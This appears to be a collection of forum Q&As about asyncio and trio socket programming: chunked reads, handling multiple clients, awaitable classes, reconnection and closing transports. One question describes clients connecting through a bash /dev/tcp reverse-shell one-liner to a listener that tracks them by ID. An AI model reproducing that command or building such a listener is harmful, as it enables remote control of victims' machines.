How to avoid blocking when reading from a socket with Python asyncio?

I'm experimenting a bit with Python asyncio to improve in that area. For self-teaching purposes I'm connecting to Redis, sending some commands and reading the response; this falls under the generic "read a stream of data from some source" problem. What I cannot solve is how to read the data in chunks, since the connection between server and client is not closed and the termination sequence \r\n can appear more than once. If I await a read when there is no more data, the call of course blocks until something else is received.
import asyncio

class Client:
    def __init__(self, loop, host='127.0.0.1', port=6379):
        self.host = host
        self.port = port
        self.reader = None
        self.writer = None
        self.loop = loop

    @asyncio.coroutine
    def _connect(self):
        self.reader, self.writer = yield from asyncio.open_connection(
            self.host, self.port, loop=self.loop)

    async def read(self, b=4096):
        resp = b''
        while True:
            chunk = await self.reader.read(b)
            if chunk:
                resp += chunk
            else:
                break
        return resp
Let's pretend I want to read the response in chunks of 2 bytes (yes, it's silly, but it's just for learning purposes), so:
loop = asyncio.get_event_loop()
client = Client(loop)
..... sends some commands here ....
resp = await client.read(2)
I cannot figure out how, without knowing the length of the server response, the code can still be safe when the response is longer than the number of bytes read from the socket.

I encountered a similar problem recently. My solution was to continue reading until a given character (or set of characters) is read. This is the same philosophy behind people saying "over" on walkie talkies when they are done talking. It is easier to just wait for the response to say that it is done talking.
While I haven't worked with the asyncio module before, I believe that the following code should solve your problem, assuming that the source of the input ends the response with whatever character (or string of characters) is indicated in the variable end_signal.
class Client:
    def __init__(self, loop, host='127.0.0.1', port=6379):
        self.host = host
        self.port = port
        self.reader = None
        self.writer = None
        self.loop = loop

    @asyncio.coroutine
    def _connect(self):
        self.reader, self.writer = yield from asyncio.open_connection(
            self.host, self.port, loop=self.loop)

    async def read(self, b=4096, end_signal=b"10101101110111110"):
        resp = b''
        while True:
            chunk = await self.reader.read(b)
            if not chunk:
                # connection closed by the peer
                break
            resp += chunk
            # stop as soon as the accumulated data ends with the end signal
            if resp[-len(end_signal):] == end_signal:
                break
        return resp
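Since the question already mentions that the replies are \r\n-terminated, another option is to let asyncio.StreamReader do the framing with readuntil. This is a minimal sketch that only handles single-line replies (e.g. +PONG) and assumes a Redis server listening on 127.0.0.1:6379; it is not a full RESP parser:

import asyncio

async def read_reply(reader):
    # readuntil returns everything up to and including the separator,
    # suspending (without blocking the event loop) until it has arrived
    line = await reader.readuntil(b'\r\n')
    return line.rstrip(b'\r\n')

async def main():
    reader, writer = await asyncio.open_connection('127.0.0.1', 6379)
    writer.write(b'PING\r\n')
    await writer.drain()
    print(await read_reply(reader))   # e.g. b'+PONG'
    writer.close()

asyncio.run(main())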

Related

How do I switch between connected clients with asyncio sockets?

I am trying to make a socket server with asyncio that can have multiple clients connected at once and can easily switch which client it communicates with while keeping all the clients connected. I thought there would be some kind of file descriptor for each client, like there is with plain sockets, but I looked through the docs and did not find anything, or I missed it.
Here is my server code:
import socket
import asyncio

host = "localhost"
port = 9998
list_of_auths = ['desktop-llpeu0p\\tomiss', 'desktop-llpeu0p\\tomisss',
                 'desktop-llpeu0p\\tomissss', 'desktop-llpeu0p\\tomisssss']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('socket initiated.')
confirmed = 'CONFIRMED'
deny = 'denied'

# (so i dont forget) to get recv in async do: var = (await reader.read(4096)).decode('utf-8') if -1 then it will read all
# (so i dont forget) to write sendall do: writer.write(var.encode('utf-8')) should be used with await writer.drain()

async def handle_client(reader, writer):
    idrecv = (await reader.read(255)).decode('utf-8')
    if idrecv in list_of_auths:
        writer.write(confirmed.encode('utf-8'))
    else:
        writer.write(deny.encode('utf-8'))
        writer.close()
    request = None
    while request != 'quit':
        print("second checkpoint")
    writer.close()

async def run_server():
    print("first checkpoint")
    server = await asyncio.start_server(handle_client, host, port)
    async with server:
        await server.serve_forever()

asyncio.run(run_server())
This code allows multiple clients to connect at once; however, it only lets me communicate with the last one that connected.
I would suggest implementing it like so:
class SocketHandler(asyncio.Protocol):
    def __init__(self):
        asyncio.Protocol.__init__(self)
        self.transport = None
        self.peername = None
        # your other code

    def connection_made(self, transport):
        """ incoming connection """
        global ALL_CONNECTIONS
        self.transport = transport
        self.peername = transport.get_extra_info('peername')
        ALL_CONNECTIONS.append(self)
        # your other code

    def connection_lost(self, exception):
        self.close()
        # your other code

    def data_received(self, data):
        # your code handling incoming data
        pass

    def close(self):
        try:
            self.transport.close()
        except AttributeError:
            pass

# global list to store all connections
ALL_CONNECTIONS = []

def send_to_all(message):
    """ sending a message to all connected clients """
    global ALL_CONNECTIONS
    for sh in ALL_CONNECTIONS:
        # here you can also check sh.peername to know which client it is
        if sh.transport is not None:
            sh.transport.write(message)

port = 5060
loop = asyncio.get_event_loop()
coro = loop.create_server(SocketHandler, '', port)
server = loop.run_until_complete(coro)
loop.run_forever()
This way, each connection to the server is represented by an instance of SocketHandler. Whenever you process some data inside this instance, you know which client connection it is.
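If you would rather stay with the streams API from the question than switch to a Protocol subclass, the same bookkeeping can be done by storing each (reader, writer) pair under an id. This is a minimal sketch; the names clients, client_ids and send_to are just illustrative:

import asyncio
import itertools

clients = {}                      # client_id -> (reader, writer)
client_ids = itertools.count(1)

async def handle_client(reader, writer):
    client_id = next(client_ids)
    clients[client_id] = (reader, writer)
    print("connected:", client_id, writer.get_extra_info('peername'))
    try:
        while True:
            data = await reader.read(4096)
            if not data:
                break
            print(f"from {client_id}:", data.decode('utf-8', 'replace'))
    finally:
        del clients[client_id]
        writer.close()

async def send_to(client_id, text):
    # pick any connected client by its id and write only to that one
    _, writer = clients[client_id]
    writer.write(text.encode('utf-8'))
    await writer.drain()

async def main():
    server = await asyncio.start_server(handle_client, "localhost", 9998)
    async with server:
        await server.serve_forever()

asyncio.run(main())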

How to run multiple instances of the same class asynchronously?

I'm looking to have many agents connect to different sockets of my local server so they can independently read and send to the server. So far I have this:
import json
import asyncio

class Agent():
    def __init__(self, user, pw):
        self.user = user
        self.pw = pw
        # Store host and port
        self.host, self.port = "localhost", 12300
        self.connect()

    async def connect(self):
        # Create asynchronous socket reader and writer
        self.reader, self.writer = await asyncio.open_connection(self.host,
                                                                  self.port)
        request = <some_json>
        # Create and send authentication request
        self.writer.write(request)
        await self.writer.drain()
        response = await self.reader.read(1000)
        response = json.loads(response.decode().split("\0")[0])
        if response["content"]["result"] == "ok":
            print("Connection Succesful")
        else:
            print("Connection Failed")
        await self.listen()

    async def receive_msg(self):
        """
        Waits for a message from the server and returns it.
        """
        msg = await self.reader.readuntil(b"\0")
        msg = msg.decode().split("\0")[0]
        # In case a message is received, parse it into a dictionary.
        if len(msg) > 1:
            return json.loads(msg)
        else:
            print("Retry receiving message...")
            return self.receive_msg()

    async def listen(self):
        """
        Listens for output from server and writes if anything is received
        """
        while True:
            msg = await self.receive_msg()
            print("Message received", self.user)

a_list = []
loop = asyncio.get_event_loop()
for i in range(15):
    a_list.append(Agent(f"agentA{i}", "1").connect())
loop.run_until_complete(asyncio.gather(*a_list))
Because of the way asyncio works, I think this is the only way to run this asynchronously. But I would like to make __init__ run asynchronously somehow, instead of having to throw the connect function into the loop, if that is possible. What I essentially would like to do is this:
a_list = []
loop = asyncio.get_event_loop()
for i in range(15):
a_list.append(Agent(f"agentA{i}", "1"))
loop.run_until_complete(asyncio.gather(*a_list))
I think that makes more sense, but I can't figure out how to do it. Am I thinking about this wrongly, or is there a better way to do it?
You can't make __init__ async, but you can make Agent instances awaitable. To do so, define the __await__ magic method:
class Agent:
    def __init__(self, user, pw):
        self.user = user
        self.pw = pw
        self.host, self.port = "localhost", 12300

    def __await__(self):
        yield from self.connect().__await__()
This has the best of both worlds: your __init__ function remains sync, and yet Agent instances are valid arguments to functions like asyncio.gather().
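With __await__ in place, the loop from the question can hand the Agent instances straight to asyncio.gather(). A short usage sketch, assuming connect() is no longer called from __init__ (as in the answer's version):

async def main():
    agents = [Agent(f"agentA{i}", "1") for i in range(15)]
    # awaiting an Agent instance runs __await__, which drives connect()
    await asyncio.gather(*agents)

asyncio.run(main())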

How can I accept new connection requests in the background?

I have a server which accepts connection requests from clients. Clients send connection requests with this command: bash -i > /dev/tcp/ip/port 0<&1 1>&1. I want my server to instantly accept new connection requests and log them to the console, but I don't know how. In the code below there is a while loop: command_accept() needs to finish before client_accept() can start, which means I always have to enter some command before new client requests get accepted. I need client_accept() to always be running in the background.
I tried setting a time limit on the input, but that's not the solution I need. I also tried different libraries for asynchronous programming, though I'm not sure I'm using them correctly.
import socket
import time
import sys

host = '127.0.0.1'
port = 1344
id_counter = 0

server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.settimeout(0.1)
server.bind((host, port))
server.listen()

clients = {}

def client_accept(server):
    while True:
        try:
            conn, addr = server.accept()
            global id_counter
            id_counter += 1
            clients[id_counter] = (conn, addr)
            print(f'{time.ctime()} New client [ID {id_counter}] with address {str(addr[0])}:{str(addr[1])}')
        except socket.timeout:
            break

def command_accept():
    command = input('server > ')
    #** don't pay attention **#
    if command == 'exit':
        sys.exit()
    else:
        print(f'command {command} accepted!')

while True:
    command_accept()
    client_accept(server)
Expected result: without me typing anything into the command_accept input, if a new client sends a request the server instantly accepts it and prints something like New client [ID 1] with address 127.0.0.1:45431.
Try doing that with socket.io and threading: when the socket gets an ON_CONNECT event you can just push the information onto a list and print it to the console.
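For completeness, here is a minimal asyncio sketch of the same idea: the blocking input() is handed to a worker thread via run_in_executor so the event loop can keep accepting clients in the background. All names are illustrative, not a drop-in replacement for the question's code:

import asyncio
import time

clients = {}
next_id = 0

async def handle_client(reader, writer):
    global next_id
    next_id += 1
    addr = writer.get_extra_info('peername')
    clients[next_id] = (reader, writer)
    print(f'{time.ctime()} New client [ID {next_id}] with address {addr[0]}:{addr[1]}')

async def command_loop():
    loop = asyncio.get_running_loop()
    while True:
        # run the blocking input() in a thread so accepting clients is never paused
        command = await loop.run_in_executor(None, input, 'server > ')
        if command == 'exit':
            break
        print(f'command {command} accepted!')

async def main():
    server = await asyncio.start_server(handle_client, '127.0.0.1', 1344)
    async with server:
        await command_loop()

asyncio.run(main())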
As an excuse to experiment with the trio async library, I ported your code to it.
Start by defining a simple class for client connections and the code to keep track of them:
from sys import stderr
from itertools import count

class Client:
    def __init__(self, stream):
        self.stream = stream

    async def run(self):
        lines = LineReader(self.stream)
        while True:
            line = (await lines.readline()).decode('ascii')
            if not line or line.strip().casefold() in {'quit', 'exit'}:
                await self.stream.send_all(b'bye!\r\n')
                break
            resp = f'got {line!r}'
            await self.stream.send_all(resp.encode('ascii') + b'\r\n')

CLIENT_COUNTER = count()
CLIENTS = {}

async def handle_client(stream):
    client_id = next(CLIENT_COUNTER)
    client = Client(stream)
    async with stream:
        CLIENTS[client_id] = client
        try:
            await client.run()
        except Exception as err:
            print('client failed', err, file=stderr)
        finally:
            del CLIENTS[client_id]
LineReader comes from here: https://stackoverflow.com/a/53576829/1358308
Next we can define the processing of the server's stdin:
async def handle_local(nursery):
    while True:
        try:
            command = await async_input('server > ')
        except EOFError:
            command = 'exit'
        if command == 'exit':
            nursery.cancel_scope.cancel()
        elif command == 'list':
            for id, client in CLIENTS.items():
                print(id, client.stream.socket.getpeername())
        else:
            print(f'unknown command {command!r}')
Check out the trio docs for info about nurseries.
This uses a utility function to wrap input up in an async function:
import trio

async def async_input(prompt=None):
    return await trio.run_sync_in_worker_thread(
        input, prompt, cancellable=True)
Then we define the code that ties all the pieces together:
SERVE_HOST = 'localhost'
SERVE_PORT = 1344

async def async_main():
    async with trio.open_nursery() as nursery:
        nursery.start_soon(handle_local, nursery)
        await trio.serve_tcp(
            handle_client,
            port=SERVE_PORT, host=SERVE_HOST,
            handler_nursery=nursery)

trio.run(async_main)
Some more links/references (by trio's author):
tutorial echo server
motivation behind the trio library

Pythonic asyncio communication with unreliable servers

Is there a standard pattern for using asyncio to poll intermittent servers?
Take the following example: a client that reads every second from an unreliable TCP server. Without error handling, the async/await notation looks great:
import asyncio

class BasicTCPClient(object):
    """TCP client without error handling."""

    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    async def connect(self):
        reader, writer = await asyncio.open_connection(self.ip, self.port)
        self.connection = {'reader': reader, 'writer': writer}

    async def get(self, request):
        self.connection['writer'].write(request.encode())
        return await self.connection['reader'].readuntil(b'\n')

async def read():
    client = BasicTCPClient('ip', 8000)
    await client.connect()
    while True:
        print(await client.get('request'))
        await asyncio.sleep(1)

ioloop = asyncio.get_event_loop()
try:
    ioloop.run_until_complete(read())
except KeyboardInterrupt:
    pass
But this doesn't handle disconnecting/reconnecting well. I have a working solution, but it's approaching 100 LOC and negates all the elegance of async/await.
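No answer is shown here, but one common shape for such a pattern is to wrap the connect-and-read cycle in an outer loop that rebuilds the connection on failure. A sketch only, reusing BasicTCPClient from above; the 5-second retry delay and the exception set are assumptions:

import asyncio

async def read_with_reconnect():
    while True:
        client = BasicTCPClient('ip', 8000)
        try:
            await client.connect()
            while True:
                print(await client.get('request'))
                await asyncio.sleep(1)
        except (OSError, asyncio.IncompleteReadError):
            # connection failed or dropped: back off, then rebuild it
            await asyncio.sleep(5)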

How to close a Python asyncio transport?

I'm working on a project which uses a Python asyncio socket server. The problem is that the server implementation doesn't call .close() on the transports when the server stops. This seems to leave clients connected and causes crashes in other parts of the code.
The Python documentation says that transports need to be closed explicitly, but in this project I don't know where to close them, because there is no reference to the transports created for each client.
https://docs.python.org/3/library/asyncio-dev.html#close-transports-and-event-loops
Here is the code:
"""
Socket server forwarding request to internal server
"""
import logging
try:
# we prefer to use bundles asyncio version, otherwise fallback to trollius
import asyncio
except ImportError:
import trollius as asyncio
from opcua import ua
from opcua.server.uaprocessor import UaProcessor
logger = logging.getLogger(__name__)
class BinaryServer(object):
def __init__(self, internal_server, hostname, port):
self.logger = logging.getLogger(__name__)
self.hostname = hostname
self.port = port
self.iserver = internal_server
self.loop = internal_server.loop
self._server = None
self._policies = []
def set_policies(self, policies):
self._policies = policies
def start(self):
class OPCUAProtocol(asyncio.Protocol):
"""
instanciated for every connection
defined as internal class since it needs access
to the internal server object
FIXME: find another solution
"""
iserver = self.iserver
loop = self.loop
logger = self.logger
policies = self._policies
def connection_made(self, transport):
self.peername = transport.get_extra_info('peername')
self.logger.info('New connection from %s', self.peername)
self.transport = transport
self.processor = UaProcessor(self.iserver, self.transport)
self.processor.set_policies(self.policies)
self.data = b""
def connection_lost(self, ex):
self.logger.info('Lost connection from %s, %s', self.peername, ex)
self.transport.close()
self.processor.close()
def data_received(self, data):
logger.debug("received %s bytes from socket", len(data))
if self.data:
data = self.data + data
self.data = b""
self._process_data(data)
def _process_data(self, data):
buf = ua.utils.Buffer(data)
while True:
try:
backup_buf = buf.copy()
try:
hdr = ua.Header.from_string(buf)
except ua.utils.NotEnoughData:
logger.info("We did not receive enough data from client, waiting for more")
self.data = backup_buf.read(len(backup_buf))
return
if len(buf) < hdr.body_size:
logger.info("We did not receive enough data from client, waiting for more")
self.data = backup_buf.read(len(backup_buf))
return
ret = self.processor.process(hdr, buf)
if not ret:
logger.info("processor returned False, we close connection from %s", self.peername)
self.transport.close()
return
if len(buf) == 0:
return
except Exception:
logger.exception("Exception raised while parsing message from client, closing")
self.transport.close()
break
coro = self.loop.create_server(OPCUAProtocol, self.hostname, self.port)
self._server = self.loop.run_coro_and_wait(coro)
print('Listening on {}:{}'.format(self.hostname, self.port))
def stop(self):
self.logger.info("Closing asyncio socket server")
self.loop.call_soon(self._server.close)
self.loop.run_coro_and_wait(self._server.wait_closed())
As you can see, when we call stop() on this server class, the asyncio server's close method gets called. However, if clients are connected, the created transports never get closed.
The project repository is here https://github.com/FreeOpcUa/python-opcua/ , you can take a look at Issue 137.
What is the correct way to close the transport object?
I solved this by applying this approach:
#self.OPCUAServer - this is my opcua server
nodes = []
nodes.append(self.OPCUAServer.get_node("ns=0; s=Measurements")) #Adding two root nodes
nodes.append(self.OPCUAServer.get_node("ns=1; s=Calibrations")) #to the list
self.OPCUAServer.delete_nodes(nodes, True) # Recursively call delete_nodes with this list
self.OPCUAServer.stop()
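Another way to approach the original question, not taken from the thread but a minimal standalone sketch, is to have each protocol instance register itself with the server object so that stop() can close every remaining transport. Class and attribute names here (TrackingServer, clients) are illustrative only:

import asyncio

class TrackingServer:
    """Sketch: keep a reference to every client protocol so that stop()
    can explicitly close the transports, as the asyncio docs require."""

    def __init__(self, host='127.0.0.1', port=4840):
        self.host = host
        self.port = port
        self.clients = []          # protocol instances, one per connection
        self._server = None

    async def start(self):
        outer = self

        class TrackedProtocol(asyncio.Protocol):
            def connection_made(self, transport):
                self.transport = transport
                outer.clients.append(self)

            def connection_lost(self, exc):
                if self in outer.clients:
                    outer.clients.remove(self)

        loop = asyncio.get_running_loop()
        self._server = await loop.create_server(TrackedProtocol, self.host, self.port)

    async def stop(self):
        for client in list(self.clients):
            client.transport.close()   # explicitly close each remaining transport
        self._server.close()
        await self._server.wait_closed()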
